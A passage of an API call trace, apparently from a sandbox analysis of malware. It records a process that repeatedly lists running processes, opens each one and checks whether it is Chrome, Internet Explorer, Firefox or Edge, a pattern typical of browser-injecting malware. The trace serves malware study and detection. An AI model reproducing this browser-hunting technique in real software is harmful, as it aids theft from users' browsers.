	[0248.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0248.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9db0
	[0248.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.963] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0248.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.963] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.963] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0248.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.964] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0248.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9db4
	[0248.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.965] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.965] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.965] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.966] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0248.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9db8
	[0248.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.967] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0248.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.967] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.967] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0248.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.968] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.968] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9dbc
	[0248.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.969] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.969] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.969] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.970] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0248.971] CloseHandle (hObject=0x4fd0) returned 1
	[0248.971] Sleep (dwMilliseconds=0x64) 
	[0249.071] GetCurrentProcessId () returned 0x110
	[0249.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0249.077] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0249.079] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0249.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0249.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9dc0
	[0249.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.084] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.085] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.086] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.086] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.086] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0249.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9dc4
	[0249.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.087] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.088] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.088] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.088] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0249.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9dc8
	[0249.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.089] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0249.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.090] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.090] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0249.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.091] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0249.091] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9dcc
	[0249.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.092] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0249.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.092] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.092] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0249.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.093] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0249.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9dd0
	[0249.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.094] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0249.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.094] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.094] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0249.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.095] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0249.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9dd4
	[0249.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.096] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0249.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.096] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.097] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0249.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.097] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.097] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0249.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9dd8
	[0249.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.098] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0249.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.098] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.099] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0249.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.099] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0249.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9ddc
	[0249.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.100] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0249.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.100] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.100] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0249.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.101] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9de0
	[0249.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.102] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.103] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.103] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9de4
	[0249.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.104] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.105] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.105] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.105] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9de8
	[0249.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.106] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.107] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.107] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.107] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9dec
	[0249.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.108] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.109] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.109] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.109] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9df0
	[0249.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.111] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.112] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.112] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9df4
	[0249.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.113] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.114] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.114] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9df8
	[0249.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.115] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.115] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.116] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.116] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0249.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9dfc
	[0249.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.118] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0249.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.118] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.118] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0249.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.118] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9e00
	[0249.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.120] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.120] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0249.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9e04
	[0249.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.122] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.122] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.122] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.123] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.123] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0249.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9e08
	[0249.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.124] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0249.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.124] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.124] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0249.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.125] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9e0c
	[0249.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.126] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.126] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.126] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
